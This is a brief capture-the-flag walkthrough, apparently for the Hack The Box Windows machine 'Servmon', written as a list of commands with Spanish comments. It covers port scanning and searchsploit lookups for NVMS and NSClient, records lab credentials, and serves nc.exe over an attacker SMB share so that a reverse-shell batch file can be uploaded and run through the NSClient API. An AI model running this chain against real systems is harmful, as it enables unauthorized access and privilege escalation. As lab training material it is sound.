
Servmon
HTB Windows
nmap -A -p- -oA servmon 10.129.96.105 —min-rate=10000 —script=vuln —script-timeout=15 -v
nmap -sC -sV -O -p- -oA servmon 10.129.96.105
nmap -sU -O -p- -oA servmon-udp 10.129.96.105
nikto -h 10.129.96.105:80
ftp 10.129.96.105
cd Users\Nadine
get Confidential.txt
cat Confidential.txt
cat Notes to do.txt
crackmapexec smb 10.129.96.105
smbclient -L 10.129.96.105 -N
searchsploit NVMS
cat 47774.txt
Abrimos burp suite y hacemos a la siguiente url:
Nos encontramos unas contrasenas Y los metemos en un archivo credentials.txt
crackmapexec smb 10.129.96.105 -u users -p credentials.txt
nadine:L1k3B1gBut7s@W0rk
whoami /priv
whoami /all
net user Nadine
searchsploit nsclient
searchsploit -m 46802
cat 46802.txt
Leemos las intrucciones del exploit
cd C:\Program Files\NSClient
nscp web —password —display
No nos funciona la contrasena
Hacemos un port forwarding
Usamos la contrasena ew2x6SsGTxjRwXOT
Aseguramos que este habilitado
Creamos un bat file y le ponemos el codigo para un reverse shell
copy \10.10.14.135\smbFolder\nc.exe nc.exe
sudo python3 /opt/impacket/smbserver.py smbFolder $(pwd) -smb2support
net use x: \10.10.14.135\smbFolder /user:cu3rv0x password123
copy x:\reverse.bat reverse.bat
copy x:\nc.exe nc.exe
Le damos click a Add pero no me funciona.
curl -k -u “admin:ew2x6SsGTxjRwXOT” -XPUT https://127.0.0.1:8443/api/v1/scripts/ext/scripts/reverse.bat —data-binary @reverse.bat
curl -k -u “admin:ew2x6SsGTxjRwXOT” https://127.0.0.1:8443/api/v1/queries/reverse/commands/execute nc -lvnp 443